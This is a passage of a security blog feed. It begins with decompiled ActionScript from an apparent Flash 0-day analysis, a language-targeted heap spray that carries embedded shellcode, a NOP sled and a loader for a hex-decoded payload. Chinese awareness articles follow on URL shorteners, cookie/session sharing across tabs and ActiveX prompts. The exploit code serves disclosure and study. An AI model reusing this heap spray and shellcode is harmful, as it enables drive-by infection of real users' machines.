this.s.writeInt(3350704551);
this.s.writeInt(2964500653);
this.s.writeInt(2762714791);
this.s.writeInt(3351162509);
this.s.writeInt(2172882626);
this.s.writeInt(2978453142);
this.s.writeInt(2341242257);
this.s.writeInt(3199633295);
this.s.writeInt(2458751107);
this.s.writeInt(2426127019);
this.s.writeInt(2358675344);
this.s.writeInt(2357696194);
this.s.writeInt(2760609415);
this.s.writeInt(2445197506);
this.s.writeInt(3347825323);
this.s.writeInt(2898446988);
this.s.writeInt(2274726292);
this.s.writeInt(2341242824);
this.s.writeInt(3431502544);
this.s.writeInt(3418531501);
this.s.writeInt(3268070017);
this.s.writeInt(2407976071);
this.s.writeInt(2592588480);
this.s.writeInt(3447833222);
this.s.writeInt(2274280141);
this.s.writeInt(2445461398);
this.s.writeInt(2274333383);
this.s.writeInt(3197211777);
this.s.writeInt(2324533654);
this.s.writeInt(3431438983);
this.s.writeInt(3267675330);
this.s.writeInt(2173538971);
this.s.writeInt(3267413899);
this.s.writeInt(3233990550);
this.s.writeInt(2274333383);
this.s.writeInt(3197211777);
this.s.writeInt(2324533654);
this.s.writeInt(3431438983);
this.s.writeInt(3268254658);
this.s.writeInt(3301229185);
this.s.writeInt(2407976071);
this.s.writeInt(2592588493);
this.s.writeInt(2177012118);
this.s.writeInt(2207291074);
this.s.writeInt(3348531087);
this.s.writeInt(2462563985);
this.s.writeInt(2491517581);
this.s.writeInt(2442579079);
this.s.writeInt(2592587979);
this.s.writeInt(3420588775);
this.s.writeInt(488447361);
this.s.writeInt(2407976071);
this.s.writeInt(2592596490);
this.s.writeInt(471604509);
this.s.writeInt(2375190412);
this.s.writeInt(3800621597);
this.s.writeInt(3035259610);
this.s.writeInt(177662050);
this.s.writeInt(3658192615);
this.s.writeInt(1658456471);
this.s.writeInt(4083391207);
this.s.writeInt(1920103026);
this.s.writeInt(2531944733);
this.s.writeInt(3077115503);
this.s.writeInt(2733055234);
this.s.writeInt(182313698);
this.s.writeInt(3793838810);
this.s.writeInt(177662050);
this.s.writeInt(3658192615);
this.s.writeInt(1658456471);
this.s.writeInt(4083391207);
this.s.writeInt(1920103026);
this.s.writeInt(2516749034);
this.s.writeInt(3907183215);
this.s.writeInt(2733055234);
this.s.writeInt(183886562);
this.s.writeInt(3793816307);
this.s.writeInt(3806519898);
this.s.writeInt(4091799138);
this.s.writeInt(552526345);
this.s.writeInt(3770294538);
this.s.writeInt(454892829);
this.s.writeInt(3106202970);
this.s.writeInt(1807606660);
this.s.writeInt(631629597);
this.s.writeInt(35762537);
this.s.writeInt(1051822242);
this.s.writeInt(2330129122);
this.s.writeInt(3803539876);
this.s.writeInt(3993672221);
this.s.writeInt(488487457);
this.s.writeInt(3014945175);
this.s.writeInt(3731461836);
this.s.writeInt(2598442932);
this.s.writeInt(1771356897);
this.s.writeInt(399584171);
this.s.writeInt(2739921191);
this.s.writeInt(3510234460);
this.s.writeInt(4074255510);
this.s.writeInt(3928173029);
this.s.writeInt(3778585097);
this.s.writeInt(333053335);
this.s.writeInt(96233916);
this.s.writeInt(3336650628);
this.s.writeInt(1777248617);
this.s.writeInt(3170820415);
this.s.writeInt(1776708065);
this.s.writeInt(659143867);
this.s.writeInt(554313759);
this.s.writeInt(488493206);
this.s.writeInt(1945003837);
this.s.writeInt(1297711467);
this.s.writeInt(867040326);
this.s.writeInt(2249045380);
this.s.writeInt(4011702825);
this.s.writeInt(3653493474);
this.s.writeInt(3806461952);
this.sc_len = this.s.length;
trace("en");
trace(this.s.length);
this.j = 3084 - this.sc_len;
this.i = 0;
while (this.i < this.j) {
// label
this.s.writeByte(144);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.s.endian = Endian.LITTLE_ENDIAN;
this.s.writeInt(1995123259);
this.s.writeInt(3435973836);
this.s.writeInt(1995172943);
this.s.writeInt(3435973836);
this.s.writeInt(2009141528);
this.s.writeInt(2009220291);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(2009213464);
this.s.writeInt(202113024);
this.s.writeInt(202113024);
this.s.writeInt(8192);
this.s.writeInt(64);
this.s.writeInt(202116560);
this.s.writeInt(0);
this.s.writeInt(202116164);
this.s.writeInt(0);
this.s.writeInt(0);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.i = 0;
while (this.i < this.sc_len) {
// label
this.s.writeInt(1676697940);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.s.writeInt(1676697940);
this.s.writeInt(1676697940);
this.s.writeInt(1676680900);
this.s.endian = Endian.BIG_ENDIAN;
this.j = 65536 - this.s.length;
this.i = 0;
while (this.i < this.j / 4) {
// label
this.s.writeInt(305419896);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.i = 0;
while (this.i < 16) {
// label
this.s2.writeBytes(this.s, 0, this.s.length);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
trace(this.s2.length);
this.i = 0;
while (this.i < 176) {
// label
this.s3 = new ByteArray();
this.s3.writeBytes(this.s2, 0, this.s2.length);
trace(this.s3.length);
this.a.push(this.s3);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.r = this.hexToBin(this.t);
this.ldr = new Loader();
this.ldr.loadBytes(this.r);
} // end if
if (Capabilities.language.toLowerCase() == "ja") {
this.s.writeInt(2425393296);
this.s.writeInt(2425393296);
this.s.writeInt(202150032);
this.s.writeInt(3943717707);
this.s.writeInt(868837049);
this.s.writeInt(1459781684);
this.s.writeInt(199418618);
this.s.writeInt(3943033067);
this.s.writeInt(4294967051);
this.s.writeInt(3554730722);
this.s.writeInt(3184599686);
this.s.writeInt(1137894114);
this.s.writeInt(3798573806);
this.s.writeInt(1772287593);
this.s.writeInt(3798590057);
this.s.writeInt(2331142421);
this.s.writeInt(2296888074);
this.s.writeInt(786686690);
this.s.writeInt(1912609418);
this.s.writeInt(2396115170);
this.s.writeInt(2324793991);
this.s.writeInt(2394319332);
this.s.writeInt(181396450);
this.s.writeInt(3798534792);
this.s.writeInt(3820685903);
this.s.writeInt(3823297024);
this.s.writeInt(459880033);
this.s.writeInt(246835486);
this.s.writeInt(167557899);
this.s.writeInt(350413538);
this.s.writeInt(3087736802);
this.s.writeInt(3806509448);
this.s.writeInt(3800621747);
this.s.writeInt(2964424930);
this.s.writeInt(498398731);
this.s.writeInt(400745186);
this.s.writeInt(171908381);
this.s.writeInt(495030150);
this.s.writeInt(3431438983);
this.s.writeInt(3268256194);
this.s.writeInt(2762846402);
this.s.writeInt(3450913472);
this.s.writeInt(3350704551);
this.s.writeInt(2964500653);
this.s.writeInt(2762714791);
this.s.writeInt(3351162509);
this.s.writeInt(2172882626);
this.s.writeInt(2978453142);
this.s.writeInt(2341242257);
this.s.writeInt(3199633295);
this.s.writeInt(2458751107);
this.s.writeInt(2426127019);
this.s.writeInt(2358675344);
this.s.writeInt(2357696194);
this.s.writeInt(2760609415);
this.s.writeInt(2445197506);
this.s.writeInt(3347825323);
this.s.writeInt(2898446988);
this.s.writeInt(2274726292);
this.s.writeInt(2341242824);
this.s.writeInt(3431502544);
this.s.writeInt(3418531501);
this.s.writeInt(3268070017);
this.s.writeInt(2407976071);
this.s.writeInt(2592588480);
this.s.writeInt(3447833222);
this.s.writeInt(2274280141);
this.s.writeInt(2445461398);
this.s.writeInt(2274333383);
this.s.writeInt(3197211777);
this.s.writeInt(2324533654);
this.s.writeInt(3431438983);
this.s.writeInt(3267675330);
this.s.writeInt(2173538971);
this.s.writeInt(3267413899);
this.s.writeInt(3233990550);
this.s.writeInt(2274333383);
this.s.writeInt(3197211777);
this.s.writeInt(2324533654);
this.s.writeInt(3431438983);
this.s.writeInt(3268254658);
this.s.writeInt(3301229185);
this.s.writeInt(2407976071);
this.s.writeInt(2592588493);
this.s.writeInt(2177012118);
this.s.writeInt(2207291074);
this.s.writeInt(3348531087);
this.s.writeInt(2462563985);
this.s.writeInt(2491517581);
this.s.writeInt(2442579079);
this.s.writeInt(2592587979);
this.s.writeInt(3420588775);
this.s.writeInt(488447361);
this.s.writeInt(2407976071);
this.s.writeInt(2592596490);
this.s.writeInt(471604509);
this.s.writeInt(2375190412);
this.s.writeInt(3800621597);
this.s.writeInt(3035259610);
this.s.writeInt(177662050);
this.s.writeInt(3658192615);
this.s.writeInt(1658456471);
this.s.writeInt(4083391207);
this.s.writeInt(1920103026);
this.s.writeInt(2531944733);
this.s.writeInt(3077115503);
this.s.writeInt(2733055234);
this.s.writeInt(182313698);
this.s.writeInt(3793838810);
this.s.writeInt(177662050);
this.s.writeInt(3658192615);
this.s.writeInt(1658456471);
this.s.writeInt(4083391207);
this.s.writeInt(1920103026);
this.s.writeInt(2516749034);
this.s.writeInt(3907183215);
this.s.writeInt(2733055234);
this.s.writeInt(183886562);
this.s.writeInt(3793816307);
this.s.writeInt(3806519898);
this.s.writeInt(4091799138);
this.s.writeInt(552526345);
this.s.writeInt(3770294538);
this.s.writeInt(454892829);
this.s.writeInt(3106202970);
this.s.writeInt(1807606660);
this.s.writeInt(631629597);
this.s.writeInt(35762537);
this.s.writeInt(1051822242);
this.s.writeInt(2330129122);
this.s.writeInt(3803539876);
this.s.writeInt(3993672221);
this.s.writeInt(488487457);
this.s.writeInt(3014945175);
this.s.writeInt(3731461836);
this.s.writeInt(2598442932);
this.s.writeInt(1771356897);
this.s.writeInt(399584171);
this.s.writeInt(2739921191);
this.s.writeInt(3510234460);
this.s.writeInt(4074255510);
this.s.writeInt(3928173029);
this.s.writeInt(3778585097);
this.s.writeInt(333053335);
this.s.writeInt(96233916);
this.s.writeInt(3336650628);
this.s.writeInt(1777248617);
this.s.writeInt(3170820415);
this.s.writeInt(1776708065);
this.s.writeInt(659143867);
this.s.writeInt(554313759);
this.s.writeInt(488493206);
this.s.writeInt(1945003837);
this.s.writeInt(1297711467);
this.s.writeInt(867040326);
this.s.writeInt(2249045380);
this.s.writeInt(4011702825);
this.s.writeInt(3653493474);
this.s.writeInt(3806461952);
this.sc_len = this.s.length;
trace("jp");
trace(this.s.length);
this.j = 3084 - this.sc_len;
this.i = 0;
while (this.i < this.j) {
// label
this.s.writeByte(144);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.s.endian = Endian.LITTLE_ENDIAN;
this.s.writeInt(2008857395);
this.s.writeInt(3435973836);
this.s.writeInt(2008833749);
this.s.writeInt(3435973836);
this.s.writeInt(2008813848);
this.s.writeInt(2008892611);
this.s.writeInt(3435973836);
this.s.writeInt(2008885784);
this.s.writeInt(202113024);
this.s.writeInt(202113024);
this.s.writeInt(8192);
this.s.writeInt(64);
this.s.writeInt(202116560);
this.s.writeInt(0);
this.s.writeInt(202116164);
this.s.writeInt(0);
this.s.writeInt(0);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.s.writeInt(3435973836);
this.i = 0;
while (this.i < this.sc_len) {
// label
this.s.writeInt(1676697940);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.s.writeInt(1676697940);
this.s.writeInt(1676697940);
this.s.writeInt(1676680900);
this.s.endian = Endian.BIG_ENDIAN;
this.j = 65536 - this.s.length;
this.i = 0;
while (this.i < this.j / 4) {
// label
this.s.writeInt(305419896);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.i = 0;
while (this.i < 16) {
// label
this.s2.writeBytes(this.s, 0, this.s.length);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
trace(this.s2.length);
this.i = 0;
while (this.i < 176) {
// label
this.s3 = new ByteArray();
this.s3.writeBytes(this.s2, 0, this.s2.length);
trace(this.s3.length);
this.a.push(this.s3);
var _loc_1: String;
_loc_1.i = this.i++;
} // end while
this.r_jp = this.hexToBin(this.t);
this.ldr_jp = new Loader();
this.ldr_jp.loadBytes(this.r_jp);
} else {
trace("I am " + Capabilities.language);
trace("failed");
} // end else if
stop();
return;
} // end function
}
}
</b></pre></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-5125799301282027767?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=fFU7QA6zrGk:8ceaAXdKuIY:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=fFU7QA6zrGk:8ceaAXdKuIY:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=fFU7QA6zrGk:8ceaAXdKuIY:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=fFU7QA6zrGk:8ceaAXdKuIY:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/fFU7QA6zrGk" height="1" width="1"/>Chrishttp://www.blogger.com/profile/01653790213029148763noreply@blogger.com0http://armorize-cht.blogspot.com/2011/04/flash-0-day.htmltag:blogger.com,1999:blog-1441759431140700676.post-66881030747818671332011-04-04T09:43:00.004+08:002011-04-04T09:47:15.616+08:002011-04-04T09:47:15.616+08:00上網安全之邪惡短網址 (Surfing Secure for URL Shortening Services)先利用 google 搜尋關鍵字:「短網址」,就可以知道何謂短網址。或者<a href="http://zh.wikipedia.org/zh-tw/%E7%B8%AE%E7%95%A5%E7%B6%B2%E5%9D%80%E6%9C%8D%E5%8B%99">查詢維基百科(Wiki)</a>也行。<br />
<br />
常見短網址服務的網域有:<br />
http://tinyurl.com/ <br />
http://0rz.tw/ <br />
http://0rz.com/ <br />
http://ppt.cc/ <br />
http://goo.gl/ <br />
http://bit.ly/ <br />
... ... <a href="http://mashable.com/2008/01/08/url-shortening-services/">其他好多</a>!! 總之我用邪惡短網址稱呼。也許它全然不是壞的,但是幾百個短網址連結,出現一個問題,可能就很頭大;問題是如果要檢查幾百個短網址可能更頭大,你該如何自處呢?點還不點連結?<br />
<span class="fullpost"><br />
短網址在網路上使用越來越廣泛了,就連 google 也加入短網址服務,這類短網址還有很多並沒有在清單中。絕大部分的短網址有個特色,域名很短且域名之後為一串固定長度的英數字組成,<b>對於短網址必須具有基本識別能力。</b>對於網站中出現的短網址也必須加以注意,因為,它很容易被利用,做為隱藏惡意連結或惡意網域之用。<br />
<br />
為了抓個圖,讓網友了解,等了許久這圖終於出現了:<br />
<a href="http://2.bp.blogspot.com/-uMbzZOcuTnE/TZhdrwrHmLI/AAAAAAAAAiQ/6l3B2Wplf-w/s1600/FB-Likejacking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://2.bp.blogspot.com/-uMbzZOcuTnE/TZhdrwrHmLI/AAAAAAAAAiQ/6l3B2Wplf-w/s320/FB-Likejacking.png" width="480" /></a><br />
這可是相當典型的「<a href="http://en.wikipedia.org/wiki/Likejacking">Likejacking</a>」手法,而且還配合短網址做利用。相關資料可以參考 <a href="http://facebrowser.blogspot.com/2011/03/facebook-spam-beautiful-marika-fruscio.html">這裡</a> 還有 <a href="http://www.facecrooks.com/safety-center/scam-watch/item/1189-warning-the-beautiful-marika-fruscio-shows-her-breasts-on-italian-tv">這裡</a> 。應該很多人已經點擊該連結了吧,問題是都沒感覺有發生過啥問題...XD。FB 現在還是很甜蜜的,再過段時日,就會有一堆垃圾、廣告、行銷的東東,甚至是惡意連結,出現在大家的牆上,沒辦法,別忘了 FB 可是要取代 EMail 的。<br />
<br />
與短網址有異曲同工之妙的,如「OWASP Top 10 for 2010」中,A10: Unvalidated Redirects and Forwards(未驗證的轉址與轉送)。短網址都大辣辣的提供服務了,相較之下,Unvalidated Redirects and Forwards 的問題實在沒啥大不了的。話說回來,把這兩個搭在一起,再做點變形,還蠻好玩的哩,可以更隱密的隱藏惡意連結...@@。<br />
<br />
對於網站上短網址的出現,需加以留意。若出現在即時通訊(MSN, Yahoo Messenger, google talk, skype …等),那就該更加小心。因為,你不知它會連結到哪個網頁上。<br />
<br />
其他 Web 常見攻擊手法或衍生資安問題<br />
<ul><li>網頁掛馬手法</li>
<li>魚叉式網路釣魚</li>
<li>關鍵字查詢利用(SEO Poison)</li>
<li>惡意程式的下載與執行</li>
<li>網路個人資料外洩</li>
<li>金融交易資料外洩</li>
<li>網路交易詐騙</li>
<li>詐騙網站、郵件</li>
<li>偽防毒網站(流氓軟體)</li>
<li>人肉搜尋</li>
<li>社群網站的個資</li>
<li>不當網路留言、不當上傳影音照片</li>
<li>內部機敏資料的外洩</li>
</ul><br />
結論:<br />
對於企業用戶而言,相信也擺脫不了瀏覽器,無論是存取內部網站或外部網頁,端點安全一直都是企業難以建全防護的地方。對於威脅而言,透過惡意網頁的滲透,很多時候也不需要高深的技術,只需要一個完美策劃的劇本,這將在在考驗企業的用戶。如何修正使用者上網觀念成為重要課題,也僅以此篇文章,與 IT 人員在推廣使用者教育訓練上,提供一些參考方向與觀念內容,強化使用者上網的觀念。<br />
<br />
完整文章亦投稿於「<a href="http://www.isecutech.com.tw/">資安人雜誌</a>,2010. Jan/Feb. No.73,你的上網行為安全嗎?」<br />
本文也張貼於「<a href="http://mysecure.blogspot.com/2011/04/surfing-secure-for-url-shortening.html">資安之我見</a>」。<br />
</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-6688103074781867133?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=GevUiVq7Bdc:1ONcmn5jPik:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=GevUiVq7Bdc:1ONcmn5jPik:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=GevUiVq7Bdc:1ONcmn5jPik:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=GevUiVq7Bdc:1ONcmn5jPik:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/GevUiVq7Bdc" height="1" width="1"/>Crane_Kuhttp://www.blogger.com/profile/00147754162769411489crane_ku@hotmail.com3http://armorize-cht.blogspot.com/2011/04/surfing-secure-for-url-shortening.htmltag:blogger.com,1999:blog-1441759431140700676.post-47037583884582184802011-03-14T12:15:00.001+08:002011-03-14T12:16:00.448+08:002011-03-14T12:16:00.448+08:00上網安全之Cookie/Session (Surfing Secure for Cookie/Session)Cookie/Session 不注意,無法確保網路身份遭到冒用或濫用。<br />
<br />
<b>這個議題很嚴重,但卻沒人注意問題的嚴重性。</b>目前主流的瀏覽器都有所謂「Tab」功能,IE 稱為「索引標籤」、Chrome & FireFox稱為「分頁」、Safari還用到兩個名稱「索引標籤」與「標籤頁」。要特別注意,目前這些新版瀏覽器,只要是同類瀏覽器,不管你開啟幾個視窗或幾個「Tab」,預設來說都會擁有相同的 Cookie/Session 身份,因為對於系統來說,預設它們都處於一個相同的 Process上。這跟早期的瀏覽器運作很不一樣,早期一個瀏覽器視窗會有獨立的 Process,因此,Cookie/Session 身份很容易切割。<br />
<br />
這會帶來甚麼問題呢?看看下圖。如果已經在一個「Tab」登入了 MSN,這時另外一個「Tab」登入 FB 之後,如果點擊了「尋友工具」,會有甚麼結果呢?<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-TP4X0gEttLI/TV3wTPsxWJI/AAAAAAAAAhg/A8bDkpAKTVo/s1600/P-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-TP4X0gEttLI/TV3wTPsxWJI/AAAAAAAAAhg/A8bDkpAKTVo/s400/P-6.png" width="289" /></a></div><span class="fullpost"><br />
答案是:FB 會自動到把 MSN 的好友清單,匯出到 FB 的邀請朋友清單中,進行邀請朋友的動作,過程中並不需要輸入 MSN 的帳號密碼。<b>問題就來了,你知道你目前正以哪一個身份瀏覽該網站嗎?</b>這也是網友該了解的一個基本觀念,否則,無法確保身份遭到冒用或濫用。<br />
<br />
如果要在同一瀏覽器下切割「視窗」或「Tab」使用不同身份,可以 google 搜尋關鍵字:「多重帳號同時登入」,可以找到一些方法,已經有很多網友提供意見,其中最方便使用的是 FireFox 的 CookiePie 套件,可以用「Tab」來切割,這點很重要,因為其它很多類似的 Cookie 管理工具並沒有「Tab」的概念存在;其他比較簡單的是 IE,只需在啟動捷徑上加入參數"-nomerge",這樣Cookie/Session 身份可以限制在「同一個 IE視窗」。<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-hS7JHVUB-54/TV3wepe5tvI/AAAAAAAAAho/8JElrP9nKJQ/s1600/P-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-hS7JHVUB-54/TV3wepe5tvI/AAAAAAAAAho/8JElrP9nKJQ/s400/P-7.png" width="315" /></a></div><br />
最簡單的方式,就是不改預設狀況下,使用不同瀏覽器來切割,但我相信這方式應該無法滿足絕大多數的網友。現今來說,瀏覽器一開,登入五、六個帳號以上大概是基本動作了,而這兩年社群網站的興起,更增加許多網站的彼此互動性,如「推」、「讚」、「噗」、「分享」…等,如下圖,這些動作都與 Cookie/Session 身份有莫大的關係。當然,大部分的網站是不會惡意利用,但,遇到釣魚網站或惡意網站,可能結果就不會如網友預期的結果。<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-XB8peyduKRs/TV3wseMfgTI/AAAAAAAAAhw/eN-z6RSwb3M/s1600/P-8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/-XB8peyduKRs/TV3wseMfgTI/AAAAAAAAAhw/eN-z6RSwb3M/s320/P-8.png" width="163" /></a></div><br />
之前也有針對臉書的攻擊行動,可參考「<a href="http://mysecure.blogspot.com/2010/06/facebook-clickjacking.html">Facebook 出現點閱綁架(Clickjacking)之攻擊手法分析</a>」一文,其中攻擊過程就有使用到跨視窗 Cookie/Session 的。國外稱此為「Likejacking」攻擊手法。<br />
<br />
最近,很多網站流行要按「讚」才看得到文章的網站。臉書上也有人發起「<a href="https://www.facebook.com/event.php?eid=206593936021300">要按讚才能觀看嗎?拒絕強迫按讚</a>」的活動,這類都是一種身份濫用的狀況,利用<b>你的身份來推銷文章</b>,很多時候這些文章一點意義也沒有...XD。預期未來這類狀況會越來越嚴重。 <br />
<br />
另外,分享對 FireFox 之 CookiePie 套件使用經驗,此套件在部分網站上會導致驗證不過的問題,或導致一些瀏覽瑕疵。所以我倒過來使用的,也就是說看到 CookiePie 運作下時,該瀏覽過程是沒有 Cookie/Session 身份在瀏覽器的「Tab」中,如下圖,先開啟空白的「Tab」,再開啟CookiePie 運作,使該「Tab」沒有 Cookie/Session 身份在其中,在此進行一般上網瀏覽的行為。<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Sn0ijEn2H3I/TV3w1SMF4RI/AAAAAAAAAh4/2_W8uhX34YI/s1600/P-9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="269" src="http://2.bp.blogspot.com/-Sn0ijEn2H3I/TV3w1SMF4RI/AAAAAAAAAh4/2_W8uhX34YI/s400/P-9.png" width="400" /></a></div><br />
完整文章亦投稿於「<a href="http://www.isecutech.com.tw/">資安人雜誌</a>,2010. Jan/Feb. No.73,你的上網行為安全嗎?」。<br />
本文也張貼於「<a href="http://mysecure.blogspot.com/2011/03/surfing-secure-for-cookiesession.html">資安之我見</a>」。<br />
</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-4703758388458218480?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=jc4Z1Ot2NZM:swl-fPyOImA:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=jc4Z1Ot2NZM:swl-fPyOImA:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=jc4Z1Ot2NZM:swl-fPyOImA:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=jc4Z1Ot2NZM:swl-fPyOImA:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/jc4Z1Ot2NZM" height="1" width="1"/>Crane_Kuhttp://www.blogger.com/profile/00147754162769411489crane_ku@hotmail.com0http://armorize-cht.blogspot.com/2011/03/surfing-secure-for-cookiesession.htmltag:blogger.com,1999:blog-1441759431140700676.post-1539203432158673482011-03-09T15:01:00.003+08:002011-03-14T12:16:25.960+08:002011-03-14T12:16:25.960+08:00上網安全之Active X (Surfing Secure for Active X)當心遭惡意利用 Active X 元件軟體。<br />
<br />
這問題經常發生於早期首頁綁架、彈出式廣告視窗...等,瀏覽器異常狀況的問題起因。<br />
<br />
Active X 是 IE 瀏覽器上,很特別的一個功能,也僅能在 IE 瀏覽器上使用,其他瀏覽器如 FireFox、Chrome 等,並未支援 Active X 功能。首先,你一定得要先看看微軟對 Active X 的說明:「在電腦上安裝 ActiveX 控制項是否安全?」<br />
網址為:<a href="http://www.microsoft.com/taiwan/protect/yourself/downloads/activex.mspx">http://www.microsoft.com/taiwan/protect/yourself/downloads/activex.mspx</a><br />
<br />
Active X 翻譯中文,很多人用「附加元件」的名稱,但要注意,FireFox 也有所謂的「附加元件」,不過英文是「Add-on」,其兩者功能與作用上很類似,但實際上是不一樣的,所以,還是以英文來稱呼,比較不容易搞混。至於 Chrome 也有類似的功能,稱為「Google Chrome Extensions (Google 瀏覽器擴充功能)」。這些所謂的套件或元件並不能跨瀏覽器使用的,目前 FireFox 與 Chrome 的附加元件或擴充功能,有進行一些機制的控管,但是也要注意使用到惡意的附加元件或擴充功能,導致瀏覽器的異常。建議由下列網址抓取附加元件或擴充功能會比較安全:<br />
FireFox:<a href="https://addons.mozilla.org/">https://addons.mozilla.org/</a><br />
Chrome:<a href="https://chrome.google.com/extensions">https://chrome.google.com/extensions</a><br />
至於,Active X 就沒有統一的管控機制,因此也比較容易被利用,這也是對此特別說明的原因。<br />
<br />
Active X 出現畫面:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://www.blogger.com/%20http://img.microsoft.com/library/media/1028/taiwan/protect/images/yourself/goldbar2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="http://img.microsoft.com/library/media/1028/taiwan/protect/images/yourself/goldbar2.gif" width="335" /></a></div><span class="fullpost"><br />
有些比較舊的 IE 版本有可能出現畫面:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-WseOfxDTkno/TV3t1FsHwRI/AAAAAAAAAhY/ELg09jJHjjE/s1600/P-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://3.bp.blogspot.com/-WseOfxDTkno/TV3t1FsHwRI/AAAAAAAAAhY/ELg09jJHjjE/s400/P-5.png" width="400" /></a></div><br />
尤其是後面這個畫面也有很多瀏覽者有網路誤解,以為可以提高瀏覽的安全性,所以閉著眼睛點擊,這是不對的;話又說回來,這畫面跟 Active X 看起來一點關係也沒有,難怪使用者會誤會。若出現上面兩張圖,它代表<b>「目前瀏覽的網站,要在瀏覽器(IE)上安裝附加元件,你是否同意?」</b>,這個動作有相當程度的危險性。<br />
<br />
早期很多惡意程式都會利用 Active X 方式,安裝到使用者的電腦中,導致首頁被綁架或不斷跳出廣告視窗…等,都是因為這個原因。來看一下一個有問題的「安全性警告」:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://farm3.static.flickr.com/2329/1548657672_dd7c3eada6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="353" src="http://farm3.static.flickr.com/2329/1548657672_dd7c3eada6.jpg" width="500" /></a></div><div style="text-align: center;">(參考「網路攻防戰」:<a href="http://anti-hacker.blogspot.com/2007/10/blog-post_12.html">http://anti-hacker.blogspot.com/2007/10/blog-post_12.html</a>)</div><br />
所以,<b>哪時該點「是」?哪時又該點「否」呢?很重要的一個觀念:「你是否信任目前瀏覽的網站,如果有疑慮避免點擊是或同意的選項」。</b>以目前來說,瀏覽網際網路很多時候取決於你是否信任該網站,很多端點防護軟體或資安設備都類似這樣的觀念在運作,像「網站信譽評等軟體(Web Reputation Services-WRS)」的運作就幾乎一樣,而這將會是你在上網警覺性上,很重要的一個基礎觀念。<br />
<br />
